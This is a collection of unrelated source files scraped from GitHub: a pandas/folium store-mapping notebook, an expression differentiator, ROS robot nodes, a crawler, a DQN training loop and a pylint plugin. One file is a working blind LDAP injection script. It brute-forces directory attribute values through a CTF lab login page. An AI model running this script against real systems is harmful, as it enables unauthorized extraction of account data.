    runs operate on distinct resources.
    """
    VOLUME_NAME = helpers.gen_random_resource_name("volume")
    VOLUME_BACKUP_NAME = helpers.gen_random_resource_name("volume_backup")
| Mirantis/mos-horizon | openstack_dashboard/test/integration_tests/tests/test_volume_backups.py | test_volume_backups.py | py | 5,876 | python | en | code | 7 | github-code | 36 |
26034310554 | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import pandas as pd
# In[2]:
# Load the raw commercial-district dataset.
commercial = pd.read_csv('./commercial.csv')
commercial
# In[3]:
# Show only the last 5 rows.
commercial.tail(5)
# In[5]:
# Column names and their count.
list(commercial), len(list(commercial))
# In[7]:
# Number of sub-category entries per shop id, descending.
commercial.groupby('상가업소번호')['상권업종소분류명'].count().sort_values(ascending=False)
# In[10]:
# Distinct business sub-categories.
category_range = set(commercial['상권업종소분류명'])
category_range, len(category_range)
# In[11]:
commercial['도로명주소']
# In[15]:
# Split the road address into 3 chunks (city / district / rest)
# and add them as new columns.
commercial[['시','구','상세주소']] = commercial['도로명주소'].str.split(' ',n=2, expand=True)
# In[16]:
commercial.tail(5)
# In[18]:
# Keep only rows whose city is Seoul.
seoul_data = commercial[ commercial['시'] == '서울특별시']
seoul_data.tail(5)
# In[22]:
# Sanity check: only Seoul should remain (set of distinct city values).
city_type = set(seoul_data['시'])
city_type
# In[24]:
# Keep only fried/seasoned chicken shops in Seoul.
seoul_chicken_data = seoul_data[ seoul_data['상권업종소분류명'] == '후라이드/양념치킨' ]
seoul_chicken_data
# In[31]:
# Chicken shop count per district, descending.
sorted_chicken_count_by_gu = seoul_chicken_data.groupby('구')['상권업종소분류명'].count().sort_values(ascending=False)
sorted_chicken_count_by_gu
# In[33]:
import matplotlib.pyplot as plt
# Korean-capable font so the axis labels render correctly.
plt.rcParams['font.family'] = 'Malgun Gothic'
# In[34]:
plt.figure(figsize=(10,5))
plt.bar(sorted_chicken_count_by_gu.index, sorted_chicken_count_by_gu)
plt.title('구에 따른 치킨 매장 수')
plt.xticks(rotation = 90)
plt.show()
# In[38]:
# Draw the counts on a map.
import folium
import json
# In[41]:
# Load the Seoul district boundaries (GeoJSON).
seoul_geo = './seoul_geo.json'
geo_data = json.load(open(seoul_geo, encoding = 'utf-8'))
geo_data
# In[50]:
# Base map centred on Seoul.
map = folium.Map(location=[37.5502, 126.982], zoom_start=11)
map
# In[51]:
# Fixed: the keyword below was misspelled "colums", so it was silently
# never passed to Choropleth.
# NOTE(review): folium examples usually use 'feature.properties.name' for
# key_on — verify this matches the loaded GeoJSON structure.
folium.Choropleth(geo_data = geo_data,
                 data=sorted_chicken_count_by_gu,
                 columns=[sorted_chicken_count_by_gu.index, sorted_chicken_count_by_gu],
                 fill_color='PuRd',
                 key_on='properties.name').add_to(map)
map
# In[ ]:
| dleorud111/chicken_data_geo_graph | 치킨 매장 수에 따른 지도 그리기.py | 치킨 매장 수에 따른 지도 그리기.py | py | 2,238 | python | ko | code | 0 | github-code | 36 |
14172419297 | from .expression_parser import ExpressionParser
class Number(object):
    """Constant leaf of an expression tree."""

    # Tolerance used when comparing the stored value against another number.
    EPS = 0.00000001

    def __init__(self, number):
        self.number = number

    def calculate(self, x):
        """Evaluate at ``x``: a constant ignores the variable entirely."""
        return self.number

    @staticmethod
    def derivative():
        """The derivative of any constant is the constant zero."""
        return Number(0)

    def equal(self, other):
        """Approximately compare this constant with the scalar ``other``."""
        return self.EPS > abs(other - self.number)
class Var(object):
    """The variable leaf ``x`` of an expression tree (stateless)."""

    def __init__(self):
        pass

    @staticmethod
    def calculate(x):
        """Evaluating the variable yields the supplied value itself."""
        return x

    @staticmethod
    def derivative():
        """d/dx of x is the constant 1."""
        return Number(1)
class Plus(object):
    """Sum node: ``expr1 + expr2``."""

    def __init__(self, expr1, expr2):
        self.expr1 = expr1
        self.expr2 = expr2

    @staticmethod
    def of(expr1, expr2):
        """Build a sum, dropping additive identities and folding constants."""
        first_is_const = isinstance(expr1, Number)
        second_is_const = isinstance(expr2, Number)
        # 0 + x == x and x + 0 == x
        if first_is_const and expr1.equal(0):
            return expr2
        if second_is_const and expr2.equal(0):
            return expr1
        # Two constants collapse into one.
        if first_is_const and second_is_const:
            return Number(expr1.number + expr2.number)
        return Plus(expr1, expr2)

    def calculate(self, x):
        """Evaluate both operands at ``x`` and add the results."""
        return self.expr1.calculate(x) + self.expr2.calculate(x)

    def derivative(self):
        """Sum rule: (u + v)' = u' + v'."""
        return Plus.of(self.expr1.derivative(), self.expr2.derivative())
class Minus(object):
    """Difference node: ``expr1 - expr2``."""

    def __init__(self, expr1, expr2):
        self.expr1 = expr1
        self.expr2 = expr2

    @staticmethod
    def of(expr1, expr2):
        """Build a difference, simplifying identities and folding constants.

        Fixes two defects of the previous version: ``0 - expr`` used to
        return ``expr`` unchanged (dropping the negation) whenever ``expr``
        was not a constant, and when it was a constant the operand was
        negated in place, corrupting any other reference to that object.
        """
        if isinstance(expr1, Number) and expr1.equal(0):
            if isinstance(expr2, Number):
                # Return a fresh negated constant instead of mutating expr2.
                return Number(-expr2.number)
            # Keep an explicit 0 - expr node so the sign is preserved.
            return Minus(expr1, expr2)
        if isinstance(expr2, Number) and expr2.equal(0):
            return expr1
        if isinstance(expr1, Number) and isinstance(expr2, Number):
            return Number(expr1.number - expr2.number)
        return Minus(expr1, expr2)

    def calculate(self, x):
        """Evaluate both operands at ``x`` and subtract."""
        return self.expr1.calculate(x) - self.expr2.calculate(x)

    def derivative(self):
        """Difference rule: (u - v)' = u' - v'."""
        return Minus.of(self.expr1.derivative(), self.expr2.derivative())
class Production(object):
    """Product node: ``expr1 * expr2``."""

    def __init__(self, expr1, expr2):
        self.expr1 = expr1
        self.expr2 = expr2

    @staticmethod
    def of(expr1, expr2):
        """Build a product, applying 0/1 identities and constant folding."""
        # Check expr1's identities first, then expr2's (same order as before).
        for const, other in ((expr1, expr2), (expr2, expr1)):
            if isinstance(const, Number):
                if const.equal(0):
                    return Number(0)    # anything * 0 == 0
                if const.equal(1):
                    return other        # anything * 1 == itself
        if isinstance(expr1, Number) and isinstance(expr2, Number):
            return Number(expr1.number * expr2.number)
        return Production(expr1, expr2)

    def calculate(self, x):
        """Evaluate both operands at ``x`` and multiply."""
        return self.expr1.calculate(x) * self.expr2.calculate(x)

    def derivative(self):
        """Product rule: (u * v)' = u'v + v'u."""
        return Plus.of(Production.of(self.expr1.derivative(), self.expr2),
                       Production.of(self.expr2.derivative(), self.expr1))
class Division(object):
    """Quotient node: ``expr1 / expr2``."""

    def __init__(self, expr1, expr2):
        self.expr1 = expr1
        self.expr2 = expr2

    @staticmethod
    def of(expr1, expr2):
        """Build a quotient, simplifying identities and folding constants.

        Note: constants are divided eagerly, so a zero constant denominator
        raises ZeroDivisionError here (same as the original behavior).
        """
        numerator_const = isinstance(expr1, Number)
        denominator_const = isinstance(expr2, Number)
        if numerator_const and expr1.equal(0):
            return Number(0)    # 0 / x == 0
        if denominator_const and expr2.equal(1):
            return expr1        # x / 1 == x
        if numerator_const and denominator_const:
            return Number(expr1.number / expr2.number)
        return Division(expr1, expr2)

    def calculate(self, x):
        """Evaluate both operands at ``x`` and divide."""
        return self.expr1.calculate(x) / self.expr2.calculate(x)

    def derivative(self):
        """Quotient rule: (u/v)' = (u'v - v'u) / v^2 (kept unsimplified)."""
        return Division(
            Minus.of(Production.of(self.expr1.derivative(), self.expr2),
                     Production.of(self.expr2.derivative(), self.expr1)),
            Production.of(self.expr2, self.expr2))
class ExpressionBuilder(object):
    """Parse a textual expression and build an evaluatable expression tree.

    ``context`` maps function names appearing in the input (e.g. "sin") to
    factories that wrap a child expression; "param_func" entries also take a
    leading float parameter.
    """
    # Binary operator token -> simplifying node factory.
    _operations = {
        "+": Plus.of,
        "-": Minus.of,
        "*": Production.of,
        "/": Division.of,
    }
    def __init__(self, context, is_debug=False):
        self._parser = ExpressionParser(is_debug)
        self._context = context
    def _build(self, node):
        """Recursively convert a parse-tree node into expression objects.

        Relies on the parser node API: is_term(), type(), value(),
        children().
        """
        if node.is_term():
            # Leaves: numeric literals and the variable.
            if node.type() == "number":
                return Number(float(node.value()))
            if node.type() == "var":
                return Var()
        children = node.children()
        if node.type() == "func":
            # children[0] holds the function name, children[1] its argument.
            return self._context[children[0].value()](
                self._build(children[1])
            )
        if node.type() == "param_func":
            # Parameterized function: name, float parameter, argument subtree.
            return self._context[children[0].value()](
                float(children[1].value()),
                self._build(children[2])
            )
        # Anything else is a binary operator node (+, -, *, /).
        return self._operations[node.type()](
            self._build(children[0]),
            self._build(children[1])
        )
    def build(self, input_str):
        """Parse ``input_str`` and return the root of the expression tree."""
        tree = self._parser.parse(input_str)
        return self._build(tree)
| sidrDetyam/numerical_math | expressions/expression_builder.py | expression_builder.py | py | 4,862 | python | en | code | 0 | github-code | 36 |
23232107868 | import rclpy # ROS client library
from rclpy.node import Node
from rclpy.qos import qos_profile_sensor_data
from sensor_msgs.msg import LaserScan
from geometry_msgs.msg import Twist
class Tb3(Node):
    """TurtleBot3 node: drives toward an obstacle and slows down near it.

    Publishes velocity commands on ``cmd_vel`` and reacts to laser scans
    from ``scan``.
    """
    def __init__(self):
        super().__init__('tb3')
        self.cmd_vel_pub = self.create_publisher(
            Twist,
            'cmd_vel',
            1)
        self.scan_sub = self.create_subscription(
            LaserScan,
            'scan',
            self.scan_callback,
            qos_profile_sensor_data)
        # Stop when closer than this many meters to the obstacle.
        self.minimum_distance = 0.2
        # Distance observed at the first scan; 0 means "not yet measured".
        self.starting_distance = 0
        # Last commanded velocities, in percent of the maxima used in vel().
        self.lin_vel_percent = 0
        self.ang_vel_percent = 0
        # Gradual acceleration and deceleration parameters
        # (percent change applied per scan message).
        self.acceleration_rate = 1
        self.deceleration_rate = 1
    def vel(self, lin_vel_percent, ang_vel_percent=0):
        """Publish a Twist scaled from percentages of the robot maxima."""
        # Burger model limits: 0.22 m/s linear is the hardware max; this
        # code deliberately caps lower at 0.1 m/s.
        MAX_LIN_VEL = 0.1
        MAX_ANG_VEL = 1.82
        cmd_vel_msg = Twist()
        cmd_vel_msg.linear.x = MAX_LIN_VEL * lin_vel_percent / 100
        cmd_vel_msg.angular.z = MAX_ANG_VEL * ang_vel_percent / 100
        self.cmd_vel_pub.publish(cmd_vel_msg)
        # Remember what was commanded so scan_callback can ramp from it.
        self.ang_vel_percent = ang_vel_percent
        self.lin_vel_percent = lin_vel_percent
    def scan_callback(self, msg):
        """Ramp speed up/down based on remaining distance to the obstacle.

        NOTE(review): assumes msg.ranges[0] is the forward-facing beam —
        confirm the scanner's angular origin.  Also assumes the first
        reading is finite and non-zero; an inf/0 first reading would make
        starting_distance unusable (division below) — verify on hardware.
        """
        if self.starting_distance == 0:
            # First scan: remember how far away the obstacle initially was.
            self.starting_distance = msg.ranges[0]
        current_distance = msg.ranges[0]
        if current_distance < self.minimum_distance:
            # Close enough: full stop.
            self.vel(0)
        else:
            velocity = 0
            # Fraction of the initial distance still remaining.
            current_distance_pc = current_distance / self.starting_distance
            if current_distance_pc >= 0.5:
                # Gradual acceleration
                velocity = min(self.lin_vel_percent + self.acceleration_rate, 100)
            elif current_distance_pc < 0.5:
                # Gradual deceleration (never below 5% so the robot keeps creeping)
                velocity = max(self.lin_vel_percent - self.deceleration_rate, 5)
            print(velocity)
            self.vel(velocity)
def main(args=None):
    """Initialize ROS 2, spin the Tb3 node, and shut down cleanly.

    Ctrl-C is swallowed so the node/context teardown below always runs.
    """
    rclpy.init(args=args)
    tb3 = Tb3()
    print('waiting for messages....')
    try:
        rclpy.spin(tb3)  # Execute tb3 node
        # Blocks until the executor (spin) cannot work
    except KeyboardInterrupt:
        pass
    tb3.destroy_node()
    rclpy.shutdown()
if __name__ == '__main__':
main()
| abysrising/PLV_Robot_Programming | challenge1.py | challenge1.py | py | 2,332 | python | en | code | 0 | github-code | 36 |
16162642541 | #!/usr/bin/env python3
import RPi.GPIO as GPIO
import rospy
from std_msgs.msg import Int32
# BCM pin number carrying the encoder signal.
ENCODER_PIN = 26
GPIO.setmode(GPIO.BCM)
# Input with the internal pull-up enabled: the encoder pulls the line low.
GPIO.setup(ENCODER_PIN, GPIO.IN, pull_up_down=GPIO.PUD_UP)
def encoder_callback():
    """Poll the encoder pin and publish a cumulative edge count on /encoder_count.

    Despite the name this is not an interrupt callback: it busy-polls the
    GPIO level at 500 Hz and increments the counter on every level change.
    NOTE(review): polling can miss pulses from a fast-spinning encoder —
    consider GPIO.add_event_detect; confirm the expected pulse rate.
    """
    count = 0
    last_state = GPIO.input(ENCODER_PIN)
    pub = rospy.Publisher('/encoder_count', Int32, queue_size=10)
    # 500 Hz polling loop.
    rate = rospy.Rate(500)
    while not rospy.is_shutdown():
        current_state = GPIO.input(ENCODER_PIN)
        if current_state != last_state:
            # Any edge (rising or falling) counts as one tick.
            count += 1
            rospy.loginfo("Encoder Count: {}".format(count))
            pub.publish(count)
        last_state = current_state
        rate.sleep()
if __name__ == '__main__':
    try:
        rospy.init_node('encoder_node')
        encoder_callback()
    finally:
        # Always release the GPIO pins, even on shutdown or exception.
        GPIO.cleanup()
| oguzhanbzglu/SergeantBot | idu_robot/scripts/encoder_node.py | encoder_node.py | py | 801 | python | en | code | 2 | github-code | 36 |
27823324545 | import requests
from bs4 import BeautifulSoup
import zlib #crc32加密
list_cyc32=[]
list_url=[]
import re
# # 为了用xpath
user_agent = 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0'
headers = {'User-Agent': user_agent}
# url="https://www.cnblogs.com/mayswind/p/15116918.html"
url="https://www.cnblogs.com/mayswind/default.html?page=3"
r = requests.get(url, headers=headers)
r.encoding = 'utf-8'
result=[]
soup=BeautifulSoup(r.text,'lxml')
#############crc32加密 只需要传str类型就行################
def crc32(x_url):
    """Return the CRC32 checksum of ``x_url`` (UTF-8 encoded) as an int."""
    return zlib.crc32(x_url.encode("utf-8"))
#############crc32加密 只需要传str类型就行################
############ 传入url 得到soup###########################
def get_soup(url):
    """Download ``url`` and return a BeautifulSoup of its UTF-8 decoded body.

    A desktop Chrome User-Agent is sent so the site serves the normal page.
    """
    request_headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0'
    }
    response = requests.get(url, headers=request_headers)
    # Force UTF-8 before .text decodes the payload.
    response.encoding = 'utf-8'
    return BeautifulSoup(response.text, 'lxml')
############ 传入url 得到soup###########################
#############找到作者所有的文章##########################
def fd_all(url):
    """Collect every article link of a cnblogs author into the module lists.

    Walks the paginated index ("/default.html?page=N") until a page has no
    article anchors, appending each article URL to ``list_url`` and its
    CRC32 to ``list_cyc32``.

    Fixes over the previous version: the globals were overwritten with a
    single scalar instead of appended to, ``list_url`` was assigned as a
    local (and lost), and every page was downloaded twice.
    """
    global list_cyc32, list_url
    # The author root is the scheme + host + user segment of the given URL.
    base = "/".join(url.split("/")[0:4])
    for page in range(1, 9999):
        page_url = base + "/default.html?page=" + str(page)
        # One fetch per page (the old code downloaded each page twice).
        anchors = get_soup(page_url).find_all(
            name='a', attrs={'class': 'postTitle2 vertical-middle'})
        if anchors == []:
            # Past the last page: cnblogs returns a page with no articles.
            break
        for anchor in anchors:
            href = anchor.get('href')
            list_cyc32.append(crc32(href))
            list_url.append(href)
#############找到作者所有的文章##########################
print(crc32(url))
print(list_url) | Madlife1/pythonProject2 | url_spider.py | url_spider.py | py | 1,896 | python | en | code | 0 | github-code | 36 |
73202442984 | from datetime import datetime
from shapely.geometry import Point
import numpy as np
from typing import List
GEODATUM_MAPPING = {
"WGS 1984": "epsg:4326",
"Ordnance Survey Great Britain 1936": "epsg:4277",
"TWD 1967": "epsg:3828",
"Gauss Krueger Meridian2": None,
"Gauss Krueger Meridian3": None,
"Gauss Krueger Austria M34": "epsg:18009",
"Gauss Krueger Austria M31": "epsg:18008",
"Rijks Driehoekstelsel": "epsg:28992",
"JRC": "epsg:3040",
"DWD": None,
"KNMI Radar": None,
"CH1903": "epsg:4149",
"PAK1": None,
"PAK2": None,
"SVY21": "epsg:3414",
}
def camel_to_snake_case(camel_case: str) -> str:
    """
    Convert camelCase to snake_case

    Args:
        camel_case (str): sentence in camelCase (e.g. myInputVariable)

    Returns:
        str: converted sentence in snake_case (in example my_input_variable)
    """
    pieces = []
    for character in camel_case:
        if character.isupper():
            # Every capital opens a new word: prefix it with an underscore.
            pieces.append("_" + character.lower())
        else:
            pieces.append(character)
    # A leading capital would produce a spurious leading underscore.
    return "".join(pieces).lstrip("_")
def snake_to_camel_case(snake_case: str) -> str:
    """
    Convert snake_case to camelCase

    Args:
        snake_case (str): sentence in snake_case (in example my_input_variable)

    Returns:
        str: converted sentence in camelCase (e.g. myInputVariable)
    """
    first, *rest = snake_case.split("_")
    # The first word stays lowercase; all later words are title-cased.
    return first + "".join(word.title() for word in rest)
def dict_to_datetime(data: dict) -> datetime:
    """
    Convert a FEWS PI datetime dict to a datetime object

    Args:
        data (dict): FEWS PI datetime (e.g. {'date': '2022-05-01', 'time': '00:00:00'})

    Returns:
        datetime: converted datetime object (e.g. datetime.datetime(2022, 5, 1, 0, 0))
    """
    # A missing "time" key means midnight.
    time_part = data.get("time", "00:00:00")
    return datetime.fromisoformat(f"{data['date']}T{time_part}")
def datetime_to_fews_str(date_time: datetime) -> str:
    """
    Format a datetime in the FEWS REST API format %Y-%m-%dT%H:%M:%SZ

    Args:
        date_time (datetime): datetime object (e.g. datetime.datetime(2022, 5, 1, 0, 0))

    Returns:
        str: formatted timestamp (e.g. 2022-05-01T00:00:00Z)
    """
    # f-string format specs delegate to strftime for datetimes.
    return f"{date_time:%Y-%m-%dT%H:%M:%SZ}"
def xy_array_to_point(xy_array: np.ndarray) -> List[Point]:
    """Convert an (n, 2) coordinate array into shapely Points (float cast)."""
    return [Point(coords) for coords in xy_array.astype(float)]
def attributes_to_array(attribute_values: np.ndarray, attributes: list) -> np.ndarray:
    """Pick the values of ``attributes`` out of each row of attribute dicts.

    Each element of ``attribute_values`` is an iterable of ``{"id", "value"}``
    dicts; the result row holds the value per requested attribute id, or
    ``None`` when that id is absent.
    """
    rows = []
    for entry in attribute_values:
        lookup = {item["id"]: item["value"] for item in entry if item["id"] in attributes}
        rows.append([lookup.get(attribute) for attribute in attributes])
    return np.array(rows)
def geo_datum_to_crs(geo_datum: str) -> str:
    """Translate a FEWS geoDatum string to an "epsg:XXXX" CRS string.

    UTM zone strings are mapped to EPSG 326xx (north) / 327xx (south);
    "EPSG:…" strings are lower-cased; known named datums are looked up in
    GEODATUM_MAPPING.  Unknown datums yield None.
    """
    if geo_datum.startswith("UTM"):
        # e.g. "UTM33N" -> zone 33 north -> epsg:32633.
        zone = int(geo_datum[3:5].lstrip("0"))
        code = 32600 + zone + (100 if geo_datum[-1] == "S" else 0)
        return f"epsg:{code}"
    if geo_datum.lower().startswith("epsg"):
        return geo_datum.lower()
    return GEODATUM_MAPPING.get(geo_datum)
| d2hydro/fewspy | src/fewspy/utils/conversions.py | conversions.py | py | 3,271 | python | en | code | 2 | github-code | 36 |
3987982365 | import pandas as pd
import numpy as np
import tensorflow as tf
import shutil
from .memories import VanillaMemory
from .agents import DQNAgent
from .gymRoom import *
from .utils import *
from .gymProfile import *
import subprocess
import threading
def thread1():
    """Launch the STAR-CCM+ server; blocks until the process exits.

    Meant to run on a worker thread (see run()).  The command string comes
    from the ``.utils`` star import at the top of the file.
    """
    # Open starccm+ server in Linux background
    subprocess.call("cd javafile && " + start_starccm_server, shell=True)
def thread2():
    """Repeatedly run the per-step Java macro in the background."""
    # Thread 2 executes Java macro commands continuously in the background,
    # and each round of loop represents a round
    for i in range(100000):
        subprocess.call(runforStep_gymGame_command, shell=True)
def run(env, a):
    """Main DQN training loop driving the STAR-CCM+ simulation.

    Args:
        env: gym-style room environment (make/state/steprun API).
        a:   DQN agent (act/step API, episode and loss bookkeeping).

    Starts the simulator server and macro runner on background threads,
    then trains episode after episode, persisting rewards, fan power,
    losses and model weights under out/.
    """
    # Modify the messenger to check info Java release, execute the next macro command
    with open("javafile/info.txt", "w") as f:
        f.write("false")
    thread_thred1 = threading.Thread(target=thread1)
    thread_thred1.start()
    time.sleep(2)
    #Create a path to the generated file.
    # out/logs/ is mainly used to store log files.
    # out/csvfile/ is the record of each round.
    # out/savemodel/ is used to save model super parameters
    all_log_path = ['out/logs/', 'out/csvfile/', 'out/tensorboard', 'out/savemodel/local/', 'out/savemodel/target/']
    for pathName in all_log_path:
        if not os.path.exists(pathName):
            os.makedirs(pathName)
    # log enable
    log()
    # Delete historical files existing in the system
    checkExistFile()
    Reward_history = []
    FanPower_history = []
    # Let macro commands hang in the background
    thread_thred2 = threading.Thread(target=thread2)
    thread_thred2.start()
    eposideFlag = True
    while True:  # Run until solved
        # print(threading.active_count())
        # Delete "RHfiles.csv" generated by history
        if os.path.exists(RHfile):
            os.remove(RHfile)
        # Initialization of rewards and fan_power in a round
        rewards_history = []
        fan_power_history = []
        # Select initial action
        startAction = [50, 50, 50, 0, 0, 0]
        # Simulation environment initialization
        env.make(startAction)
        time.sleep(6)
        stepFlag = True
        while True:
            # Get the current environment
            state, _ = env.state(a.t_step)
            # Get the current action according to the environment
            action = a.act(state)
            # Modify the action and execute the simulation environment
            state_next, reward, done, fan_power = env.steprun(action, a.t_step)
            # # Recalculate if model floating-point overflow
            state_flag = np.mean(state_next)
            if state_flag > 61 or state_flag < 40:
                # Mean state outside the plausible band: treat the episode
                # as diverged and restart it without recording anything.
                stepFlag = False
                break
            # Store the reward and fan_power of each step in a round
            rewards_history.append(reward)
            fan_power_history.append(fan_power)
            print("timestep", a.t_step, "action:", action, "reward:", reward, "fanpower:",
                  fan_power)
            # Store data and train models
            a.step(state, action, reward, state_next, done)
            # Judge whether to end the round
            if done is True:
                break
        # If the model diverges, this round will not be recorded
        if stepFlag is False:
            eposideFlag = False
            continue
        if eposideFlag is False:
            eposideFlag = True
            continue
        episode = a.episodes - 1
        Reward_history.append(sum(rewards_history))
        FanPower_history.append(sum(fan_power_history))
        print('episode', episode, 'score', sum(rewards_history), 'score_max', max(Reward_history), "FanPowerSUM",
              sum(fan_power_history))
        # save episode_reward_history and each_episode_rewards_history
        name = [str(episode)]
        pd.DataFrame(data=[rewards_history], index=name). \
            to_csv(each_episode_rewards_history_csv, sep=',', mode='a', encoding='utf-8')
        pd.DataFrame(data=[fan_power_history], index=name). \
            to_csv(each_FanPower_history_csv, sep=',', mode='a', encoding='utf-8')
        pd.DataFrame(data=[Reward_history], index=name). \
            to_csv(episode_reward_history_csv, sep=',', encoding='utf-8')
        pd.DataFrame(data=[FanPower_history], index=name). \
            to_csv(FanPower_history_csv, sep=',', encoding='utf-8')
        pd.DataFrame(data=np.array([a.losses]).reshape(-1, 1)). \
            to_csv(Loss_history_csv, encoding='utf-8')
        # Save RHfile.csv history of each round as RHfile_episode.csv
        dstFile = all_log_path[1] + 'RHfile_' + str(episode) + '.csv'
        try:
            shutil.copyfile(RHfile, dstFile)
        except Exception as e:
            print(e)
        # Save model super parameters
        if episode % 100 == 0:
            # a.network_local.save_weights(all_log_path[3] + 'RHfile_' + str(episode))
            a.network_target.save_weights(all_log_path[4] + 'RHfile_' + str(episode))
        # Judge the conditions for model convergence and training completion
        # (mean reward of the last 10 episodes above 20).
        if len(Reward_history) >= 10 and (np.mean(Reward_history[-10:])) > 20:
            print("Solved at episode {}!".format(episode))
break | danfenggithub/HumidityControl | solutions/run.py | run.py | py | 5,234 | python | en | code | 6 | github-code | 36 |
7004766354 | #!/usr/bin/python
from bs4 import BeautifulSoup
import requests
import time
import sys
import urllib
from itertools import chain
import argparse
url = "http://10.10.10.122/login.php"
startUrl = "http://10.10.10.122/"
proxyValues = {'http': 'http://127.0.0.1:8080'}
SLEEP_VALUE = 3
lower_letters = range(97,123)
upper_letters = range(65,91)
number_set = range(48,58)
#r= requests.get(url)
#sessionCookie = r.cookies
#print (r.text)
testRange = range(107,109)
#print ("*** Sleeping for %d seconds***" % SLEEPVALUE)
#time.sleep(SLEEPVALUE) #sleep little baby
def findLDAPAttribute(sessionID, lineList, pl, fullRange):
    """Blindly extract LDAP attribute values, one character at a time.

    For every attribute name in ``lineList`` the payload template ``pl``
    (e.g. ``'*)({0}={1}'``) is instantiated with a growing prefix followed
    by ``*``.  A non-empty ``div.col-sm-10`` message in the response marks
    a hit, so the matched character is appended to the token.  The search
    for an attribute stops when a full pass over the charset adds nothing.

    Args:
        sessionID: PHPSESSID cookie value of an established session.
        lineList:  attribute names to probe.
        pl:        payload template with two format slots (attribute, value).
        fullRange: iterable of candidate character ordinals.

    Returns:
        dict mapping each attribute that produced output to its value.

    Fixes over the previous version: ``fullRange`` is materialised once (a
    one-shot itertools.chain used to be exhausted after the first pass,
    silently aborting options 4 and 5), and a failed POST now skips the
    response-parsing step instead of dereferencing a stale/undefined ``r``.
    """
    headerValues = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0',
                    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                    'Accept-Language': 'en-US,en;q=0.5',
                    'Accept-Encoding': 'gzip, deflate',
                    'Referer': 'http://10.10.10.122/login.php',
                    'Connection': 'close'}
    # range() objects are re-iterable but itertools.chain is not: freeze
    # the charset so every pass sees all candidate characters.
    charset = list(fullRange)
    failedList = []
    foundAttributeDict = {}
    for attribute in lineList:
        token = ''
        giveUp = False
        while not giveUp:
            length_before_pass = len(token)
            for character in charset:
                payload = pl.format(attribute, token + chr(character) + '*')
                print("trying payload %s" % payload)
                # The target decodes twice, so double URL-encoding is needed.
                payload = urllib.parse.quote_plus(payload)
                reqdata = {'inputUsername': payload, 'inputOTP': '123456'}
                response = None
                with requests.session() as s:
                    try:
                        s.keep_alive = False
                        response = s.post(url, cookies={'PHPSESSID': sessionID},
                                          data=reqdata, headers=headerValues,
                                          proxies=proxyValues)
                    except Exception as e:
                        print(repr(e))
                        failedList.append(attribute)
                    finally:
                        s.close()
                if response is not None:
                    # Look for the result message in the login page.
                    soup = BeautifulSoup(response.text, 'html.parser')
                    resultSet = soup.findAll("div", {"class": "col-sm-10"})
                    if len(resultSet[0].text) > 1:
                        # Ignore responses that echo our (double-encoded) payload.
                        if "%" not in resultSet[0].text:
                            # "Cannot login" is the indicator for the blind
                            # injection: keep the matched character.
                            token += chr(character)
                            print("Found a value in attribute %s of value %s" % (attribute, token))
                    else:
                        print("no value for %s on length %d with length %d"
                              % (attribute, len(resultSet[0].text), len(response.text)))
                time.sleep(SLEEP_VALUE)
            # If no character matched during this pass, the value is complete.
            if len(token) == length_before_pass:
                giveUp = True
            print("We are at %s" % token)
        if len(token) > 0:
            foundAttributeDict.update({attribute: token})
            print("All done! values are %s : %s" % (attribute, token))
    if len(failedList) > 0:
        print("We failed on attributes " + str(failedList))
    for keys, value in foundAttributeDict.items():
        print(keys, value)
    return foundAttributeDict
def main():
    """Parse CLI arguments and run the blind LDAP attribute brute-force.

    Command line:
        -o/--option     character set to brute-force (1-Upper, 2-Lower,
                        3-Numbers, 4-LowerNumbers, 5-all)
        -f/--attribFile file with one LDAP attribute name per line
        -s/--sessionID  PHPSESSID cookie value of an authenticated session
    """
    parser = argparse.ArgumentParser(description='blind ldap injector')
    parser.add_argument('--option', '-o', help = "1-Upper,2-Lower,3-Numbers,4-LowerNumbers,5-all", required=True, choices={1,2,3,4,5}, type=int)
    parser.add_argument('--attribFile', '-f', help = "attribute file", required=True)
    parser.add_argument('--sessionID', '-s', help = "phpsession id", required= True)
    args = parser.parse_args()
    sessionID = args.sessionID
    filename = args.attribFile
    options = args.option
    with open (filename,'r') as f:
        # strip trailing newlines so payloads are built from clean attribute names
        lineList = [line.rstrip() for line in f]
    print ("Starting with SessionID %s Filename %s Option - %d" % (sessionID,filename,options))
    fullRange = ''
    if options == 1: fullRange = upper_letters
    elif options == 2: fullRange = lower_letters
    elif options == 3: fullRange = number_set
    # BUG FIX: itertools.chain returns a one-shot iterator, but fullRange is
    # iterated repeatedly (once per while-pass per attribute) and passed to
    # findLDAPAttribute twice below, so the chain would be exhausted after its
    # very first pass. Materialize it into a list so it can be re-iterated.
    elif options == 4: fullRange = list(chain(lower_letters, number_set))
    elif options == 5: fullRange = list(chain(upper_letters, lower_letters, number_set))
    print (fullRange)
    # first pass: wildcard-prefixed payload matches any account
    payload = '*)({0}={1}'
    findLDAPAttribute(sessionID, lineList, payload, fullRange)
    # second pass: payload anchored to the known 'ldapuser' account
    payload = 'ldapuser)({0}={1}'
    findLDAPAttribute(sessionID, lineList, payload, fullRange)
if __name__ == '__main__':
    sys.exit(main())
#print ("Message is of length %d and is [%s]" % (len(resultSet[0].text), resultSet[0].text))
#print (r.text)
| nutty-guineapig/htb-pub | CTF/blindLDAPInjector.py | blindLDAPInjector.py | py | 5,035 | python | en | code | 0 | github-code | 36 |
15980397887 | """Check for usage of models that were replaced in 2.0."""
from pylint.checkers import BaseChecker
from pylint.interfaces import IAstroidChecker
class NautobotReplacedModelsImportChecker(BaseChecker):
    """Visit 'import from' statements to find usage of models that have been replaced in 2.0."""

    __implements__ = IAstroidChecker

    version_specifier = ">=2,<3"

    name = "nautobot-replaced-models"
    msgs = {
        "E4211": (
            "Imports a model that has been replaced (dcim.DeviceRole -> extras.Role).",
            "nb-replaced-device-role",
            "Reference: https://docs.nautobot.com/projects/core/en/next/development/apps/migration/model-updates/extras/#replace-role-related-models-with-generic-role-model",
        ),
        "E4212": (
            "Imports a model that has been replaced (dcim.RackRole -> extras.Role).",
            "nb-replaced-rack-role",
